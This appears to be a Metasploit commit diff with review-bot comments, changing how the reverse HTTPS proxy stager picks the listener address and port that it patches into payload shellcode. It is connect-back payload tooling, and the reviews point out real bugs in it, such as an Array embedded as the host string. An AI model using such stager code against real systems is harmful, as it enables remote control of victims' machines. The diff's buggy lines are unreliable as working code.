Update reverse_https_proxy stager/handler

This change updates the proxy handler code, which for some reason was
omitted in the original commits. This now uses the same mechanism as
the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead
uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.
bug/bundler_fix
OJ 2013-11-11 22:21:05 +10:00
parent 12810580d6
commit 063da8a22e
2 changed files with 36 additions and 12 deletions


@ -42,13 +42,17 @@ module ReverseHttpsProxy
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]), OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]), OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]), OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]), OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"]) OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
], Msf::Handler::ReverseHttpsProxy) ], Msf::Handler::ReverseHttpsProxy)
register_advanced_options(
[
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
], Msf::Handler::ReverseHttpsProxy)
end end
end end
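Review bot: The description on the new `OptAddress.new('ReverseListenerBindAddress', ...)` line only says "The specific IP address to bind to on the local system", but per the commit message (and the stager file in this same commit, which assigns `lhost = bind_address`) the value also replaces the host embedded in the generated stager, so a user reading the option has no hint that it ends up inside the payload. Suggest `'The specific IP address to bind to on the local system (when set, also embedded in the stager in place of LHOST)'`, or a short comment above the option saying the same. The commit message also names `ReverseListenerBindHost`, while the options actually registered here are `ReverseListenerBindAddress` and `ReverseListenerBindPort`; worth aligning the text so people searching for the option find it. The enclosing `register_options`/`initialize` body begins above this hunk.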


@ -134,11 +134,7 @@ module Metasploit3
p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V") p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V")
# patch the LPORT # patch the LPORT
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 lport = bind_port
lport = datastore['HIDDENPORT']
else
lport = datastore['LPORT']
end
lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444 lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444
p[lportloc+1] = [lport.to_i].pack('V')[0] p[lportloc+1] = [lport.to_i].pack('V')[0]
@ -148,11 +144,7 @@ module Metasploit3
# append LHOST and return payload # append LHOST and return payload
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? lhost = bind_address
lhost = datastore['HIDDENHOST']
else
lhost = datastore['LHOST']
end
p + lhost.to_s + "\x00" p + lhost.to_s + "\x00"
end end
@ -163,5 +155,33 @@ module Metasploit3
def wfs_delay def wfs_delay
20 20
end end
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
end end
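Review bot: In `bind_address` the wildcard normalisation line compares the whole array to a string — `addrs == "::0"` can never be true, so an IPv6 wildcard given as ReverseListenerBindAddress is never mapped to `any`; it should read `addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs[0] == "::0")`. The same helper is also used for stager generation in the earlier hunk (`lhost = bind_address`, then `p + lhost.to_s + "\x00"`), but `bind_address` returns an Array, so `lhost.to_s` emits the Array's inspect form (something like `["10.0.0.1", "0.0.0.0"]`) rather than a host string, and the list is built for binding a listener (it deliberately falls back to `0.0.0.0`/`::0`), which is not a usable connect-back address. If the intent is "ReverseListenerBindAddress when set, else LHOST" as the commit message suggests, the stager should pick that value directly, e.g. `lhost = datastore['ReverseListenerBindAddress'].to_s.empty? ? datastore['LHOST'] : datastore['ReverseListenerBindAddress']`, and leave `bind_address` to the listener. Minor style: `if not datastore['ReverseListenerBindAddress'].to_s.empty?` reads better as `unless datastore['ReverseListenerBindAddress'].to_s.empty?`. The generate method containing the `lhost = bind_address` assignment starts before the first hunk of this file.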